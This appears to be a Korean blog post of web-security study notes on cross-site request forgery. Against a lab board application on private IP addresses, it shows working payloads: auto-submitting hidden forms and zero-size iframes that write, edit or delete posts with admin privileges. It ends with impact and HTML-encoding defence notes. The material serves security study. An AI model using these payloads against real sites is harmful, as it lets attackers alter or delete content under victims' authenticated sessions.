CSRF
공격자가 작성해 놓은 request를 통해 일어나는 악위적인 공격
자신의 의도와는 다른 액션이 발생
차이
xss : 악성 스크립트가 사용자 클라이언트에서 일어남
csrf : 인증 완료된 자신의 권한으로 서버에 요청
---------
.75 -> 웹서버
.140 -> 공격자 IP
<form name="csrf" action="board_update_reg.asp" method="POST">
<input type="text" name="user" value="admin">
<input type="text" name="title" value="test">
<input type="text" name="contents" value="test">
<input type="text" name="idx" value="">
<input type="submit" value="">
</form>
-> 임의로 관리자의 권한으로 글 삭제
---------
<body onload="document.csrf.submit();">
<form name="csrf" action="board_write_reg.asp" method="POST" ENCTYPE="multipart/form-data">
<input type="hidden" name="title" value="">
<input type="hidden" name="content" value="">
</form>
-> 임의로 글 작성
-> 소스에서 쓰는 name값을 써주어야함 (ex. name="content || name="contents" )
------------------
<iframe src="http://192.168.0.140/1.html" width=0 height=0></iframe>
--------
1.html 소스
<body onload="document.csrf.submit();">
<form name="csrf" action="http://192.168.0.140/board_write_reg.asp" method="POST" ENCTYPE="multipart/form-data">
<input type="hidden" name="title" value="공지이이이이">
<input type="hidden" name="content" value="공지사항이니 주의깊게 읽으시길">
</form>
----------
<body onload="document.csrf.submit();">
<form name="csrf" action="http://192.168.0.75/board/board_update_reg.asp" method="POST">
<input type="hidden" name="user" value="admin">
<input type="hidden" name="title" value="공지이이이이">
<input type="hidden" name="content" value="공지사항이니 주의깊게 읽으시길">
<input type="hidden" name="idx" value="12">
</form>
-><iframe> 태그로 임의로 글 수정
-----------------
<iframe src="http://192.168.0.75/board/board_delete.asp?num=12" width=0 height=0></iframe>
-> 임의로 게시글 지우기
-> URL 창에서 http://192.168.0.75/board/board_delete.asp?num=12 입력해도 가능
-> 서버의 각기 다른 파라미터 값을 파악하는 것이 주요
del = delete
update = modify = edit
...
...
-------------------------
1. what
: 공격자가 작성해 놓은 악의적인 글을 통해서 희생자의 의도와는 다른 행위가 일어나는 공격
2. why
html 사용에 의해 일어남
xss와 근본적으로 원인이 같음
victim : 사용자, 관리자
3. attack test
우선 xss 공격이 일어나는 것을 확인 후
소스 보기를 활용해서 공격 (오픈 소스일 경우 공격 성공 확률이 높음)
4. impact
타인의 글을 수정, 삭제, 생성 가능
(타인의 의도와 상관없이 발생)
5. security
xss와 같음
html encoding(화이트리스트 방식 적용)
'Web' 카테고리의 다른 글
webshell and defense of it (0) | 2014.11.06 |
---|---|
CSRF (0) | 2014.11.05 |
advanced web (0) | 2014.10.30 |
tools and searching vulnerabilities (0) | 2014.10.29 |
googling (0) | 2014.10.28 |